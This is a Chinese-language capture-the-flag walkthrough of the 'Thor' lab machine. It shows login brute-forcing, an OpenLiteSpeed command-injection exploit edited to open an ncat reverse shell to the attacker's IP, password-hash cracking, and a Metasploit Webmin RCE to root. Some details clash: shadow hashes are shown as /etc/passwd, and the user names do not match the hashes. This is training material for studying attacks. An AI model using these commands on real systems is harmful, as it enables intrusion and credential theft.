雷神托尔演练

概括

在本指南中，我们将通过命令注入漏洞获得初始访问权限，Openlitespeed WebServer并使用 Metasploit 升级权限以利用易受攻击的服务中的 RCE webmin。

本演练使用以下版本的工具：

Kali 2022.2
nmap v7.92
cupp v3.3.0
burp suite 2022.5.1
hashcat v6.2.5
metasploit 6.2.3-dev-

枚举

我们首先运行nmap扫描来识别开放端口和正在运行的服务

┌──(kali㉿kali)-[~]
└─$ nmap 192.168.120.156 -Pn -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-15 21:47 IST
Nmap scan report for 192.168.120.156
Host is up (0.0023s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
7080/tcp  open  empowerid
10000/tcp open  snet-sensor-mgmt

Nmap done: 1 IP address (1 host up) scanned in 105.05 seconds

我们看到以下内容：

端口22和80开放
Webmin在端口上运行10000
Open LiteSpeed WebConsole在端口上运行7080

从 port 开始80 ，我们打开我们选择的网络浏览器并导航到目标 IP。

我们注意到用户Jane Foster

我们可以使用 https://github.com/Mebus/cupp 和名称生成自定义单词列表Jane Foster

┌──(kali㉿kali)-[~]
└─$ cd cupp     
                                                                                                                                                              
┌──(kali㉿kali)-[~/thor_test/cupp]
└─$ python3 cupp.py -i
 ___________ 
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\   
              ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                            [ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: jane
> Surname: foster
................................................................
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to jane.txt, counting 392 words.
> Hyperspeed Print? (Y/n) : Y
[+] Now load your pistolero with jane.txt and shoot! Good luck!

现在我们可以尝试使用暴力破解密码burp

我们首先使用该proxy功能拦截登录请求，我们会看到以下输出

POST /login.php HTTP/1.1
Host: 192.168.120.156:7080
Cookie: LSUI37FE0C43B84483E0=2603767660ab6ea58e9fe1b961b27f66; litespeed_admin_lang=english
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.120.156:7080/login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: https://192.168.120.156:7080
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

userid=admin&pass=test

我们可以尝试使用自定义单词列表来暴力破解密码jane.txt

首先，我们将请求发送到intruder选项卡并导航到该positions选项

我们可以选择cluster bomb攻击选项并在userid和pass参数下插入有效负载标记

接下来，我们导航到payloads选项卡并加载自定义单词列表jane.txt

jane.txt我们可以对第二个有效负载集重复该过程，并在选择start attack选项之前再次加载我们的自定义单词列表

按长度对响应代码进行排序后，我们注意到唯一的200响应包含凭据admin:Foster2020

开发

登录后，我们将被重定向到显示的仪表板Openlitespeed WebServer 1.7.8

我们注意到Openlitespeed WebServer 1.7.8容易受到Authenticated Command Injection https://www.exploit-db.com/exploits/49556的攻击

┌──(kali㉿kali)-[~]
└─$ searchsploit Openlitespeed WebServer 1.7.8 
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                            |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)                                                                                     | multiple/webapps/49556.py
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

我们可以编辑漏洞利用程序第 71 行的 IP 地址并输入以下内容：

"path" : "/usr/bin/ncat -nv 192.168.119.26 4444 -e /bin/bash",

现在我们可以在攻击机器上设置监听器

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 4444
listening on [any] 4444 ...

接下来，我们可以使用用户名admin、密码执行我们的漏洞利用，并以组身份Foster2020输入shadow

┌──(kali㉿kali)-[~]
└─$ python3 49556.py 192.168.120.156:7080 admin Foster2020 shadow  
[+] Authentication was successful!
[+] Version is detected: OpenLiteSpeed 1.7.8
[+] The target is vulnerable!
[+] tk value is obtained: 0.41951700 1615783571
[+] Sending reverse shell to 192.168.119.26:4444 ...
[+] Triggering command execution...

最后，我们在监听器上捕获了一个反向 shell

┌──(kali㉿kali)-[~]
└─$ sudo nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.119.26] from (UNKNOWN) [192.168.120.156] 33658
whoami
nobody
groups
shadow

python我们可以使用以下命令将 shell 升级到更稳定的shell：

python3 -c 'import pty; pty.spawn("/bin/bash")'

在枚举目标时，我们看到可以查看/etc/passwd文件的内容

nobody@Lite:/usr/bin$ cat /etc/passwd
root:$6$m5SVCu8ScjUr7Byz$a4Jzk1h149Sfgv41SUIvP0zLKh1mkF6e9eHJuxG7t03/WB5zDrUl3.e7IOJ/bi1KBMmZcZ7SCuSXK7nRIT9SO1:18701:0:99999:7:::
daemon:*:18474:0:99999:7:::
bin:*:18474:0:99999:7:::
sys:*:18474:0:99999:7:::
sync:*:18474:0:99999:7:::
games:*:18474:0:99999:7:::
man:*:18474:0:99999:7:::
lp:*:18474:0:99999:7:::
mail:*:18474:0:99999:7:::
news:*:18474:0:99999:7:::
uucp:*:18474:0:99999:7:::
proxy:*:18474:0:99999:7:::
www-data:*:18474:0:99999:7:::
backup:*:18474:0:99999:7:::
list:*:18474:0:99999:7:::
irc:*:18474:0:99999:7:::
gnats:*:18474:0:99999:7:::
nobody:*:18474:0:99999:7:::
systemd-network:*:18474:0:99999:7:::
systemd-resolve:*:18474:0:99999:7:::
systemd-timesync:*:18474:0:99999:7:::
messagebus:*:18474:0:99999:7:::
syslog:*:18474:0:99999:7:::
_apt:*:18474:0:99999:7:::
tss:*:18474:0:99999:7:::
uuidd:*:18474:0:99999:7:::
tcpdump:*:18474:0:99999:7:::
avahi-autoipd:*:18474:0:99999:7:::
usbmux:*:18474:0:99999:7:::
rtkit:*:18474:0:99999:7:::
dnsmasq:*:18474:0:99999:7:::
cups-pk-helper:*:18474:0:99999:7:::
speech-dispatcher:!:18474:0:99999:7:::
avahi:*:18474:0:99999:7:::
kernoops:*:18474:0:99999:7:::
saned:*:18474:0:99999:7:::
nm-openvpn:*:18474:0:99999:7:::
hplip:*:18474:0:99999:7:::
whoopsie:*:18474:0:99999:7:::
colord:*:18474:0:99999:7:::
geoclue:*:18474:0:99999:7:::
pulse:*:18474:0:99999:7:::
gnome-initial-setup:*:18474:0:99999:7:::
gdm:*:18474:0:99999:7:::
ubuntu:$1$LeSPK8LH$krLxlta7UXiPbWtUshCjJ1:18678:0:99999:7:::
systemd-coredump:!!:18678::::::
sshd:*:18701:0:99999:7:::
thor:$6$g6IMkEpA.ojz4osB$8MC6SM8VkNNYv4N7FCHxQYY7qPjsojsuPjFxPvY96J2NfLl5/z2ZV5RDd3e4Xo/UH2Een62cXZ8rxlLww5Z4m1:18701:0:99999:7:::
lsadm:!:18701::::::

我们看到两个用户，thor并且lsadm。我们可以使用以下方法破解他们的哈希值hashcat

┌──(kali㉿kali)-[~]
└─$ cat hashes.txt                                         
$6$m5SVCu8ScjUr7Byz$a4Jzk1h149Sfgv41SUIvP0zLKh1mkF6e9eHJuxG7t03/WB5zDrUl3.e7IOJ/bi1KBMmZcZ7SCuSXK7nRIT9SO1
$6$g6IMkEpA.ojz4osB$8MC6SM8VkNNYv4N7FCHxQYY7qPjsojsuPjFxPvY96J2NfLl5/z2ZV5RDd3e4Xo/UH2Een62cXZ8rxlLww5Z4m1

┌──(kali㉿kali)-[~]
└─$ hashcat -m 1800 -a 0 -o cracked.txt hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

...
...
Recovered........: 1/2 (50.00%) Digests, 1/2 (50.00%) Salts
...
...
                                                                                         
┌──(kali㉿kali)-[~]
└─$ cat cracked.txt 
$6$g6IMkEpA.ojz4osB$8MC6SM8VkNNYv4N7FCHxQYY7qPjsojsuPjFxPvY96J2NfLl5/z2ZV5RDd3e4Xo/UH2Een62cXZ8rxlLww5Z4m1:valkyrie

SSH现在我们可以使用用户名thor和密码登录valkyrie

┌──(kali㉿kali)-[~]
└─$ ssh thor@192.168.120.156
...
...
thor@Lite:~$

升级

我们首先检查运行的进程root

thor@Lite:~$ ps -aux | grep webmin
root        1091  0.0  1.0  37892 10760 ?        Ss   15:51   0:00 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf
thor       48471  0.0  0.0   6432   656 pts/0    S+   19:21   0:00 grep --color=auto webmin

我们看到它webmin正在以 root 身份运行

导航到/usr/share/webmin/我们可以查看以下 perl 脚本，changepass.pl

thor@Lite:/usr/share/webmin$ ls -la /usr/share/webmin/changepass.pl
-rwxr-xr-x 1 root root 2228 Nov 10  2020 /usr/share/webmin/changepass.pl

我们注意到该root小组可以阅读以下内容/usr/share/webmin/changepass.pl

我们可以重用之前的漏洞利用并将组更改为root以读取脚本

再次，我们首先设置监听器

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 4444
listening on [any] 4444 ...

我们执行漏洞利用

┌──(kali㉿kali)-[~]
└─$ python3 49556.py 192.168.120.156:7080 admin Foster2020 root
[+] Authentication was successful!
[+] Version is detected: OpenLiteSpeed 1.7.8
[+] The target is vulnerable!
[+] tk value is obtained: 0.26482300 1615960561
[+] Sending reverse shell to 127.0.0.1:4444 ...
[+] Triggering command execution...

我们在监听器中收到响应

┌──(kali㉿kali)-[~/thor_test]
└─$ sudo nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.119.26] from (UNKNOWN) [192.168.120.156] 48502
whoami
nobody
groups
bin
python3 -c 'import pty; pty.spawn("/bin/bash")'

现在我们可以查看内容了changepass.pl

nobody@Lite:/usr/bin$ cat /usr/share/webmin/changepass.pl
cat /usr/share/webmin/changepass.pl
```perl
#!/usr/bin/perl
# changepass.pl
# Script for the user to change their webmin password

# Check command line arguments
usage() if (@ARGV != 3);
($config, $user, $pass) = @ARGV;
if (!-d $config) {
	print STDERR "The config directory $config does not exist\n";
	exit 2;
	}
if (!open(CONF, "<$config/miniserv.conf")) {
	print STDERR "Failed to open $config/miniserv.conf : $!\n";
	print STDERR "Maybe $config is not the Webmin config directory.\n";
	exit 3;
	}
while(<CONF>) {
	if (/^([^=]+)=(\S+)/) { $config{$1} = $2; }
	}
close(CONF);

# Update the users file
if (!open(USERS, "<".$config{'userfile'})) {
	print STDERR "Failed to open Webmin users file $config{'userfile'} : $!\n";
	exit 4;
	}
while(<USERS>) {
	s/\r|\n//g;
	local @user = split(/:/, $_);
	if (@user) {
		$users{$user[0]} = \@user;
		push(@users, $user[0]);
		}
	}
close(USERS);
$uinfo = $users{$user};
if (!defined($uinfo)) {
	print STDERR "The Webmin user $user does not exist\n";
	print STDERR "The users on your system are: ",join(" ", @users),"\n";
	exit 5;
	}
srand(time() ^ $$);
$salt = chr(int(rand(26))+65).chr(int(rand(26))+65);
$uinfo->[1] = crypt($pass, $salt);
$uinfo->[6] = time();
if (!open(USERS, ">$config{'userfile'}")) {
	print STDERR "Failed to open Webmin users file $config{'userfile'} : $!\n";
	exit 6;
	}
foreach $v (values %users) {
	print USERS join(":", @$v),"\n";
	}
close(USERS);
print "Updated password of Webmin user $user\n";

# Send a signal to have miniserv reload it's config
if (open(PID, "<".$config{'pidfile'})) {
	$pid = <PID>;
	$pid =~ s/\r|\n//;
	close(PID);
	if (!$pid) {
		print STDERR "Webmin is not running - cannot refresh configuration\n";
		}
	elsif (!kill('USR1', $pid)) {
		print STDERR "Failed to signal process $pid - cannot refresh configuration\n";
		}
	}
else {
	print STDERR "Webmin is not running - cannot refresh configuration\n";
	}

sub usage
{
print STDERR <<EOF;
usage: changepass.pl <config-dir> <login> <password>

This program allows you to change the password of a user in the Webmin
password file. For example, to change the password of the admin user
to foo, you would run:
	changepass.pl /etc/webmin admin foo
This assumes that /etc/webmin is the Webmin configuration directory.
EOF
exit 1;
}

该脚本修改miniserv.conf和miniserv.users文件以更改位于的 webmin 密码/etc/webmin

thor@Lite:~$ ls -l /etc/webmin/miniserv.conf 
-rw-rw---- 1 root bin 979 Mar 16 22:46 /etc/webmin/miniserv.conf
thor@Lite:~$ ls -l /etc/webmin/miniserv.users 
-rw-rw---- 1 root bin 9 Mar 16 22:40 /etc/webmin/miniserv.users

由于该bin组对这两个文件都有写访问权限，因此我们可以对该bin组重复使用该漏洞

再次，我们首先设置监听器

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 4444
listening on [any] 4444 ...

我们执行漏洞利用

┌──(kali㉿kali)-[~/thor_test]
└─$ python3 49556.py 192.168.120.156:7080 admin Foster2020 bin 
[+] Authentication was successful!
[+] Version is detected: OpenLiteSpeed 1.7.8
[+] The target is vulnerable!
[+] tk value is obtained: 0.38517800 1615960791
[+] Sending reverse shell to 127.0.0.1:4444 ...
[+] Triggering command execution...

我们在监听器中收到响应

┌──(kali㉿kali)-[~/thor_test]
└─$ sudo nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.119.26] from (UNKNOWN) [192.168.120.156] 48502
whoami
nobody
groups
bin
python3 -c 'import pty; pty.spawn("/bin/bash")'

nobody@Lite:/usr/bin$ /usr/share/webmin/changepass.pl /etc/webmin root pwn
Updated password of Webmin user root

我们可以检查可以运行的可用命令sudo -l

thor@Lite:~$ sudo -l
Matching Defaults entries for thor on lite:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User thor may run the following commands on lite:
    (root) NOPASSWD: /usr/bin/systemctl restart webmin

我们看到可以重启webmin服务了

thor@Lite:~$ sudo /usr/bin/systemctl restart webmin

转向searchsploit，我们看到一个metasploit可用于webmin https://www.exploit-db.com/exploits/49318的模块

┌──(kali㉿kali)-[~]
└─$ searchsploit webmin
.....................
Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit)                                                                                             | linux/webapps/47330.rb

我们可以从启动开始 metasploit

┌──(kali㉿kali)-[~]
└─$ msfconsole -q
msf6 >

我们输入以下选项以获得用户的完全访问root权限

msf6 > use exploit/linux/http/webmin_packageup_rce
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_packageup_rce) > set rhosts 192.168.120.156
rhosts => 192.168.120.156
msf6 exploit(linux/http/webmin_packageup_rce) > set lhost eth0
lhost => eth0
msf6 exploit(linux/http/webmin_packageup_rce) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
msf6 exploit(linux/http/webmin_packageup_rce) > set lport 1411
lport => 1411
msf6 exploit(linux/http/webmin_packageup_rce) > set username root
username => root
msf6 exploit(linux/http/webmin_packageup_rce) > set password pwn
password => pwn
msf6 exploit(linux/http/webmin_packageup_rce) > exploit

[*] Started reverse TCP handler on 192.168.119.26:1411 
[+] Session cookie: a0d87bc4983b1725beedff423a01cbc3
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (192.168.120.156:1411 -> 192.168.43.130:34814) at 2021-03-17 11:34:41 +0530

whoami
root
id              
uid=0(root) gid=0(root) groups=0(root)

文章版权归作者所有，未经允许请勿转载。

THE END

Offensive Security PG Practise

Thor

雷神托尔演练

概括

枚举

开发

升级